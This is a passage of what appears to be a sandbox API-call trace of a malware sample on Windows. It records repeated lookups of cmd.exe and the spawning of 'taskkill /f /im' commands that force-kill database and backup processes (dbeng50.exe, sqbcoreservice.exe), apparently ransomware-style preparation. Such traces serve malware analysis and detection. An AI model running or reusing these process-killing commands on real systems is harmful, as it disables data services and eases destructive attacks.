ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0200.548] CreateFileW (lpFileName="cmd.exe.msc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.msc"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0200.548] GetEnvironmentVariableW (in: lpName="path", lpBuffer=0x123e9ee0, nSize=0x64 | out: lpBuffer="") returned 0x63 [0200.548] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x12451868 | out: lpFileInformation=0x12451868*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa5d0fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa5d0fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa5d0fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x31600)) returned 1 [0200.549] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1248a000, nSize=0x64 | out: lpBuffer="") returned 0x35 [0200.549] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x124518b8 | out: lpFileInformation=0x124518b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa5d0fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa5d0fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa5d0fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x31600)) returned 1 [0200.549] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0200.550] GetConsoleMode (in: hConsoleHandle=0x158, lpMode=0x123a3a7c | out: lpMode=0x123a3a7c) returned 0 [0200.550] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0200.550] GetConsoleMode (in: hConsoleHandle=0x138, lpMode=0x123a3a80 | out: lpMode=0x123a3a80) returned 0 [0200.550] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0200.550] GetConsoleMode (in: hConsoleHandle=0x134, lpMode=0x123a3a80 | out: lpMode=0x123a3a80) returned 0 [0200.550] GetEnvironmentStringsW () returned 0x8ea900* [0200.551] FreeEnvironmentStringsW (penv=0x8ea900) returned 1 [0200.551] GetCurrentProcess () returned 0xffffffff [0200.551] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x158, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x124575f0, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x124575f0*=0x130) returned 1 [0200.551] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x138, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x124575f4, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x124575f4*=0x13c) returned 1 [0200.551] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x134, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x124575f8, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x124575f8*=0x140) returned 1 [0200.552] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="cmd.exe /c \"taskkill /f /im dbeng50.exe \"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x400, lpEnvironment=0x12490000, lpCurrentDirectory=0x0, lpStartupInfo=0x123a3aa4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x130, hStdOutput=0x13c, hStdError=0x140), lpProcessInformation=0x123a3a80 | out: lpCommandLine="cmd.exe /c \"taskkill /f /im dbeng50.exe \"", lpProcessInformation=0x123a3a80*(hProcess=0x154, hThread=0x144, dwProcessId=0x9b4, dwThreadId=0x9a8)) returned 1 [0200.591] CloseHandle (hObject=0x144) returned 1 [0200.591] CloseHandle (hObject=0x140) returned 1 [0200.591] CloseHandle (hObject=0x13c) returned 1 [0200.591] CloseHandle (hObject=0x130) returned 1 [0200.591] CloseHandle (hObject=0x158) returned 1 [0200.591] CloseHandle (hObject=0x138) returned 1 [0200.591] CloseHandle (hObject=0x134) returned 1 [0200.592] WaitForSingleObject (hHandle=0x154, dwMilliseconds=0xffffffff) returned 0x0 [0202.655] SetEvent (hEvent=0x150) returned 1 [0202.655] GetExitCodeProcess (in: hProcess=0x154, lpExitCode=0x123a3bb4 | out: lpExitCode=0x123a3bb4*=0x80) returned 1 [0202.655] GetProcessTimes (in: hProcess=0x154, lpCreationTime=0x124673e0, lpExitTime=0x124673e8, lpKernelTime=0x124673f0, lpUserTime=0x124673f8 | out: lpCreationTime=0x124673e0, lpExitTime=0x124673e8, lpKernelTime=0x124673f0, lpUserTime=0x124673f8) returned 1 [0202.656] CloseHandle (hObject=0x154) returned 1 [0202.656] SetEvent (hEvent=0x128) returned 1 [0202.657] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0x5) returned 0x102 [0202.675] SetEvent (hEvent=0x128) returned 1 [0202.675] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1247c0d0, nSize=0x64 | out: lpBuffer="") returned 0x35 [0202.677] GetFileAttributesExW (in: lpFileName="cmd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x12447958 | out: lpFileInformation=0x12447958*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0202.677] CreateFileW (lpFileName="cmd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0202.678] GetFileAttributesExW (in: lpFileName="cmd.exe.com" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.com"), fInfoLevelId=0x0, lpFileInformation=0x124479a8 | out: lpFileInformation=0x124479a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0202.678] CreateFileW (lpFileName="cmd.exe.com" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.com"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0202.678] GetFileAttributesExW (in: lpFileName="cmd.exe.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.exe"), fInfoLevelId=0x0, lpFileInformation=0x124479f8 | out: lpFileInformation=0x124479f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0202.678] CreateFileW (lpFileName="cmd.exe.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0202.678] GetFileAttributesExW (in: lpFileName="cmd.exe.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.bat"), fInfoLevelId=0x0, lpFileInformation=0x12447a48 | out: lpFileInformation=0x12447a48*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0202.678] CreateFileW (lpFileName="cmd.exe.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.bat"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0202.679] GetFileAttributesExW (in: lpFileName="cmd.exe.cmd" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.cmd"), fInfoLevelId=0x0, lpFileInformation=0x12447a98 | out: lpFileInformation=0x12447a98*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0202.679] CreateFileW (lpFileName="cmd.exe.cmd" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.cmd"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0202.679] GetFileAttributesExW (in: lpFileName="cmd.exe.vbs" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbs"), fInfoLevelId=0x0, lpFileInformation=0x12447ae8 | out: lpFileInformation=0x12447ae8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0202.679] CreateFileW (lpFileName="cmd.exe.vbs" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbs"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0202.679] GetFileAttributesExW (in: lpFileName="cmd.exe.vbe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbe"), fInfoLevelId=0x0, lpFileInformation=0x12447b38 | out: lpFileInformation=0x12447b38*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0202.679] CreateFileW (lpFileName="cmd.exe.vbe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0202.679] GetFileAttributesExW (in: lpFileName="cmd.exe.js" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.js"), fInfoLevelId=0x0, lpFileInformation=0x12447b88 | out: lpFileInformation=0x12447b88*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0202.679] CreateFileW (lpFileName="cmd.exe.js" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.js"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0202.679] GetFileAttributesExW (in: lpFileName="cmd.exe.jse" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.jse"), fInfoLevelId=0x0, lpFileInformation=0x12447bd8 | out: lpFileInformation=0x12447bd8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0202.679] CreateFileW (lpFileName="cmd.exe.jse" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.jse"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0202.679] GetFileAttributesExW (in: lpFileName="cmd.exe.wsf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsf"), fInfoLevelId=0x0, lpFileInformation=0x12447c28 | out: lpFileInformation=0x12447c28*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0202.680] CreateFileW (lpFileName="cmd.exe.wsf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsf"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0202.680] GetFileAttributesExW (in: lpFileName="cmd.exe.wsh" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsh"), fInfoLevelId=0x0, lpFileInformation=0x12447c78 | out: lpFileInformation=0x12447c78*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0202.680] CreateFileW (lpFileName="cmd.exe.wsh" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsh"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0202.680] GetFileAttributesExW (in: lpFileName="cmd.exe.msc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.msc"), fInfoLevelId=0x0, lpFileInformation=0x12447cc8 | out: lpFileInformation=0x12447cc8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0202.680] CreateFileW (lpFileName="cmd.exe.msc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.msc"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0202.680] GetEnvironmentVariableW (in: lpName="path", lpBuffer=0x1247c1a0, nSize=0x64 | out: lpBuffer="") returned 0x63 [0202.680] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x12447d18 | out: lpFileInformation=0x12447d18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa5d0fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa5d0fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa5d0fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x31600)) returned 1 [0202.680] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1247c270, nSize=0x64 | out: lpBuffer="") returned 0x35 [0202.680] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x12447d68 | out: lpFileInformation=0x12447d68*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa5d0fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa5d0fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa5d0fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x31600)) returned 1 [0202.680] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0202.681] GetConsoleMode (in: hConsoleHandle=0x154, lpMode=0x123a3a7c | out: lpMode=0x123a3a7c) returned 0 [0202.681] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0202.681] GetConsoleMode (in: hConsoleHandle=0x134, lpMode=0x123a3a80 | out: lpMode=0x123a3a80) returned 0 [0202.681] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0202.681] GetConsoleMode (in: hConsoleHandle=0x138, lpMode=0x123a3a80 | out: lpMode=0x123a3a80) returned 0 [0202.681] GetEnvironmentStringsW () returned 0x8ea900* [0202.682] FreeEnvironmentStringsW (penv=0x8ea900) returned 1 [0202.682] GetCurrentProcess () returned 0xffffffff [0202.682] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x154, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x12449b00, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x12449b00*=0x158) returned 1 [0202.682] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x134, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x12449b04, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x12449b04*=0x130) returned 1 [0202.682] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x138, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x12449b08, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x12449b08*=0x13c) returned 1 [0202.683] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="cmd.exe /c \"taskkill /f /im sqbcoreservice.exe \"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x400, lpEnvironment=0x12486a80, lpCurrentDirectory=0x0, lpStartupInfo=0x123a3aa4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x158, hStdOutput=0x130, hStdError=0x13c), lpProcessInformation=0x123a3a80 | out: lpCommandLine="cmd.exe /c \"taskkill /f /im sqbcoreservice.exe \"", lpProcessInformation=0x123a3a80*(hProcess=0x144, hThread=0x140, dwProcessId=0xd98, dwThreadId=0x12c8)) returned 1 [0202.728] CloseHandle (hObject=0x140) returned 1 [0202.728] CloseHandle (hObject=0x13c) returned 1 [0202.728] CloseHandle (hObject=0x130) returned 1 [0202.728] CloseHandle (hObject=0x158) returned 1 [0202.728] CloseHandle (hObject=0x154) returned 1 [0202.728] CloseHandle (hObject=0x134) returned 1 [0202.728] CloseHandle (hObject=0x138) returned 1 [0202.728] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0xffffffff) returned 0x0 [0204.195] SetEvent (hEvent=0x150) returned 1 [0204.195] GetExitCodeProcess (in: hProcess=0x144, lpExitCode=0x123a3bb4 | out: lpExitCode=0x123a3bb4*=0x80) returned 1 [0204.196] GetProcessTimes (in: hProcess=0x144, lpCreationTime=0x1245da20, lpExitTime=0x1245da28, lpKernelTime=0x1245da30, lpUserTime=0x1245da38 | out: lpCreationTime=0x1245da20, lpExitTime=0x1245da28, lpKernelTime=0x1245da30, lpUserTime=0x1245da38) returned 1 [0204.196] CloseHandle (hObject=0x144) returned 1 [0204.197] SetEvent (hEvent=0x128) returned 1 [0204.197] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0x5) returned 0x102 [0204.211] SetEvent (hEvent=0x150) returned 1 [0204.211] SetEvent (hEvent=0x128) returned 1 [0204.211] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1248a0d0, nSize=0x64 | out: lpBuffer="") returned 0x35 [0204.212] GetFileAttributesExW (in: lpFileName="cmd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x12451908 | out: lpFileInformation=0x12451908*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0204.212] CreateFileW (lpFileName="cmd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0204.212] GetFileAttributesExW (in: lpFileName="cmd.exe.com" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.com"), fInfoLevelId=0x0, lpFileInformation=0x12451958 | out: lpFileInformation=0x12451958*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0204.212] CreateFileW (lpFileName="cmd.exe.com" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.com"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0204.212] GetFileAttributesExW (in: lpFileName="cmd.exe.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.exe"), fInfoLevelId=0x0, lpFileInformation=0x124519a8 | out: lpFileInformation=0x124519a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0204.212] CreateFileW (lpFileName="cmd.exe.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0204.213] GetFileAttributesExW (in: lpFileName="cmd.exe.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.bat"), fInfoLevelId=0x0, lpFileInformation=0x124519f8 | out: lpFileInformation=0x124519f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0204.213] CreateFileW (lpFileName="cmd.exe.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.bat"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0204.213] GetFileAttributesExW (in: lpFileName="cmd.exe.cmd" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.cmd"), fInfoLevelId=0x0, lpFileInformation=0x12451a48 | out: lpFileInformation=0x12451a48*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0204.213] CreateFileW (lpFileName="cmd.exe.cmd" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.cmd"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0204.213] GetFileAttributesExW (in: lpFileName="cmd.exe.vbs" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbs"), fInfoLevelId=0x0, lpFileInformation=0x12451a98 | out: lpFileInformation=0x12451a98*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0204.213] CreateFileW (lpFileName="cmd.exe.vbs" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbs"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0204.213] GetFileAttributesExW (in: lpFileName="cmd.exe.vbe" (normalized: 